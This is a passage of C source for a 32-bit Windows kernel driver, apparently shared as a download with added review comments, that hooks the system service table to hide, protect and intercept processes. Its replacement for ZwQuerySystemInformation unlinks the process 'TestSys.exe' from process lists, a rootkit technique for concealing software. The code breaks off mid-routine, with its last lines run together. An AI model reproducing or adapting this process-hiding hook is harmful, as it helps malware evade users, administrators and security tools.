Fake_NtQuerySystemInfo 断链进程隐藏,Fake_NtOpenProcess 保护进程,Fake_NtCreateSection进程创建等,SSDT hook
WDK_protect.zip
  • protect.c
/*
 * protect.c -- x86 Windows kernel driver that replaces entries of the
 * system service table (SSDT) with the Fake_* routines declared below.
 * From the ZW* typedefs and Old* pointers, the hooked services are
 * ZwQuerySystemInformation, ZwCreateSection and ZwOpenProcess; only the
 * start of the first replacement routine is visible in this excerpt.
 * The hook/unhook sequence itself (MDL mapping, dispatch routines,
 * DriverEntry) lies outside this excerpt.
 */
#include "ntddk.h"
#include "ldasm.h"

/* Device object name and the user-visible symbolic link to it.
 * The IoCreateDevice call that uses them is not in this excerpt, so it is
 * not possible to tell here whether a restrictive security descriptor is
 * applied; every IOCTL below is FILE_ANY_ACCESS, so the device's ACL is the
 * only thing gating who can issue them. */
const WCHAR DeviceName[]=L"\\Device\\protect";
const WCHAR DeviceLink[]=L"\\DosDevices\\protect";

/* Layout of the kernel's service descriptor table entry, packed so that
 * the field offsets match the exported KeServiceDescriptorTable (only the
 * first four fields are used by the macros below; Base[] holds the
 * service routine pointers and is indexed by the syscall number). */
#pragma pack(1)
typedef struct _KSERVICE_TABLE_DESCRIPTOR {
    PULONG_PTR Base;
    PULONG Count;
    ULONG Limit;
#if defined(_IA64_)
    LONG TableBaseGpOffset;
#endif
    PUCHAR Number;
} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR;
#pragma pack()

/* Exported by ntoskrnl on 32-bit Windows; resolved at link time. */
KSERVICE_TABLE_DESCRIPTOR NTSYSAPI KeServiceDescriptorTable;

/* MDLSystemCall / MappedSystemCallTable: presumably an MDL over the
 * service table and the kernel-mode alias mapped from it -- the code that
 * builds the mapping is outside this excerpt. HOOK_SYSCALL/UNHOOK_SYSCALL
 * write through MappedSystemCallTable, never through
 * KeServiceDescriptorTable.Base directly.
 * NOTE(review): a Base[] entry that no longer points into ntoskrnl is the
 * usual integrity-check signal for this kind of hook. */
PMDL MDLSystemCall;
PULONG MappedSystemCallTable;

/* Running totals of the CPU time of the process entries that
 * Fake_ZwQuerySystemInformation removes from the SystemProcessInformation
 * list (it adds curr->UserTime / curr->KernelTime to these). Where they
 * are consumed is not visible here. Zero-initialized as globals. */
LARGE_INTEGER m_UserTime;
LARGE_INTEGER m_KernelTime;

/* Remaining driver state; none of these is referenced in this excerpt,
 * so their meaning cannot be confirmed here. */
PCHAR output;
PCHAR protect;
LONG pid;
KEVENT event;

/* IOCTL codes 0x1000..0x1007, all METHOD_BUFFERED / FILE_ANY_ACCESS.
 * The dispatch routine that interprets them is not in this excerpt; the
 * names suggest one query pair plus three hook/unhook pairs (one per
 * hooked service), but that is inferred from the names only. */
#define IOCTL_PROCESS_INFORMATION_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1000, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_PROCESS_NUMBER_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1001, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_HOOKAPI_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1002, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_UNHOOKAPI_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1003, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_HOOKAPI_CONTROL1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1004, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_UNHOOKAPI_CONTROL1 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1005, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_HOOKAPI_CONTROL2 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1006, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_UNHOOKAPI_CONTROL2 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x1007, METHOD_BUFFERED, FILE_ANY_ACCESS)

/* SYSCALL_INDEX reads the 32-bit value at byte offset 1 of a Zw* function
 * (presumably the immediate of the "mov eax, <index>" that begins the
 * 32-bit Zw* stub -- TODO confirm against the target build); SYSTEMSERVICE
 * uses that index to look up the current Base[] entry. Both are x86-only
 * by construction: there is no bounds check against Limit, and a function
 * that does not start with that instruction yields a garbage index. */
#define SYSTEMSERVICE(_function) KeServiceDescriptorTable.Base[ *(PULONG)((PUCHAR)_function+1) ]
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)

/* HOOK_SYSCALL atomically swaps Base[_Index] (via the mapped alias) for
 * _Hook and stores the previous pointer in _Orig. The (LONG) casts make
 * this 32-bit only; on x64 they would truncate the pointer.
 * NOTE(review): UNHOOK_SYSCALL never uses _Orig -- the caller has to pass
 * the saved original pointer as _Hook, and the returned old value is
 * discarded. The parameter names are misleading. */
#define HOOK_SYSCALL(_Index, _Hook, _Orig ) \
    _Orig = InterlockedExchange( (PLONG) &MappedSystemCallTable[_Index], (LONG) _Hook)
#define UNHOOK_SYSCALL(_Index, _Hook, _Orig ) \
    InterlockedExchange( (PLONG) &MappedSystemCallTable[_Index], (LONG) _Hook)

/* Per-thread record that follows each process entry in the
 * SystemProcessInformation buffer. Layout taken from undocumented
 * 32-bit structures; not validated against any particular OS build here. */
typedef struct _SYSTEM_THREAD {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientId;
    KPRIORITY Priority;
    LONG BasePriority;
    ULONG ContextSwitchCount;
    ULONG State;
    KWAIT_REASON WaitReason;
} SYSTEM_THREAD, *PSYSTEM_THREAD;

/* One entry of the SystemProcessInformation list. NextEntryOffset is the
 * byte distance to the next entry (0 marks the last one); the hook below
 * edits this field to unlink entries. Threads[0] is the MSVC zero-length
 * array idiom (C99 would spell it Threads[]). */
typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER Reserved[3];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    ULONG ProcessId;
    ULONG InheritedFromProcessId;
    ULONG HandleCount;
    ULONG Reserved2[2];
    ULONG PrivatePageCount;
    VM_COUNTERS VirtualMemoryCounters;
    IO_COUNTERS IoCounters;
    SYSTEM_THREAD Threads[0];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

/* Per-processor time counters (SystemProcessorPerformanceInformation
 * layout). Not referenced in this excerpt. */
typedef struct _SYSTEM_PROCESSOR_TIMES {
    LARGE_INTEGER IdleTime;
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER DpcTime;
    LARGE_INTEGER InterruptTime;
    ULONG InterruptCount;
} SYSTEM_PROCESSOR_TIMES, *PSYSTEM_PROCESSOR_TIMES;

/* Information classes for ZwQuerySystemInformation. Several values are
 * deliberately duplicated (25, 28, 29, 30, 44) as alternate names for the
 * same class; only SystemProcessInformation (5) is used in this excerpt. */
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation = 0,
    SystemCpuInformation = 1,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
    Unknown4,
    SystemProcessInformation = 5,
    Unknown6,
    Unknown7,
    SystemProcessorPerformanceInformation = 8,
    Unknown9,
    Unknown10,
    SystemModuleInformation = 11,
    Unknown12,
    Unknown13,
    Unknown14,
    Unknown15,
    SystemHandleInformation = 16,
    Unknown17,
    SystemPageFileInformation = 18,
    Unknown19,
    Unknown20,
    SystemCacheInformation = 21,
    Unknown22,
    SystemInterruptInformation = 23,
    SystemDpcBehaviourInformation = 24,
    SystemFullMemoryInformation = 25,
    SystemNotImplemented6 = 25,
    SystemLoadImage = 26,
    SystemUnloadImage = 27,
    SystemTimeAdjustmentInformation = 28,
    SystemTimeAdjustment = 28,
    SystemSummaryMemoryInformation = 29,
    SystemNotImplemented7 = 29,
    SystemNextEventIdInformation = 30,
    SystemNotImplemented8 = 30,
    SystemEventIdsInformation = 31,
    SystemCrashDumpInformation = 32,
    SystemExceptionInformation = 33,
    SystemCrashDumpStateInformation = 34,
    SystemKernelDebuggerInformation = 35,
    SystemContextSwitchInformation = 36,
    SystemRegistryQuotaInformation = 37,
    SystemCurrentTimeZoneInformation = 44,
    SystemTimeZoneInformation = 44,
    SystemLookasideInformation = 45,
    SystemSetTimeSlipEvent = 46,
    SystemCreateSession = 47,
    SystemDeleteSession = 48,
    SystemInvalidInfoClass4 = 49,
    SystemRangeStartInformation = 50,
    SystemVerifierInformation = 51,
    SystemAddVerifier = 52,
    SystemSessionProcessesInformation = 53,
    SystemInformationClassMax
} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;

/* Function-pointer types for the three hooked services; the saved
 * originals below have these types.
 * NOTE(review): Length/ResultLength are declared SIZE_T/PSIZE_T here rather
 * than the ULONG/PULONG usually documented -- identical width on 32-bit,
 * which is the only target these macros support anyway. */
typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN SIZE_T Length, OUT PSIZE_T ResultLength );
typedef NTSTATUS (NTAPI *ZWCREATESECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL);
typedef NTSTATUS (NTAPI *ZWOPENPROCESS)( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, IN PCLIENT_ID ClientId OPTIONAL );

/* Local prototype for the kernel export (presumably because the ntddk.h
 * used here does not declare it); needed so SYSCALL_INDEX can take its
 * address. */
NTSTATUS NTAPI ZwQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN SIZE_T Length, OUT PSIZE_T ResultLength);

/* Original service routines saved by HOOK_SYSCALL; each Fake_* routine
 * must forward to these. */
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
ZWCREATESECTION OldZwCreateSection;
ZWOPENPROCESS OldZwOpenProcess;

/* Replacement for ZwQuerySystemInformation. Calls the saved original and,
 * when the class is SystemProcessInformation and the call succeeded, walks
 * the returned list comparing each ImageName (case-insensitively) with the
 * hard-coded "TestSys.exe" and unlinks matching entries, accumulating their
 * CPU time into m_UserTime / m_KernelTime. The body continues beyond this
 * excerpt. */
NTSTATUS NTAPI Fake_ZwQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN SIZE_T Length, OUT PSIZE_T ResultLength )
{
    NTSTATUS Status;
    UNICODE_STRING process_name;
    RtlInitUnicodeString(&process_name, L"TestSys.exe");
    Status = OldZwQuerySystemInformation( SystemInformationClass, SystemInformation, Length, ResultLength );
    if(NT_SUCCESS(Status))
    {
        if(SystemInformationClass == SystemProcessInformation)
        {
            struct _SYSTEM_PROCESS_INFORMATION *curr = (struct _SYSTEM_PROCESS_INFORMATION *)SystemInformation;
            struct _SYSTEM_PROCESS_INFORMATION *prev =
NULL; if(curr->NextEntryOffset) ((char *)curr += curr->NextEntryOffset); while(curr) { if (curr->ImageName.Buffer != NULL) { if (RtlEqualUnicodeString(&process_name, &curr->ImageName, TRUE)) { m_UserTime.QuadPart += curr->UserTime.QuadPart; m_KernelTime.QuadPart += curr->KernelTime.QuadPart; if(prev) // Middle or Last entry { if(curr->NextEntryOffset) prev->NextEntryOffset += curr->NextEntryOffset; else // we are last, so make prev the end prev->NextEntryOffset = 0; } else { if(curr->NextEntryOffset) { // we are first in the list, so move it forward (char *)SystemInformation += curr->NextEntryOffset; } else // we are the only process!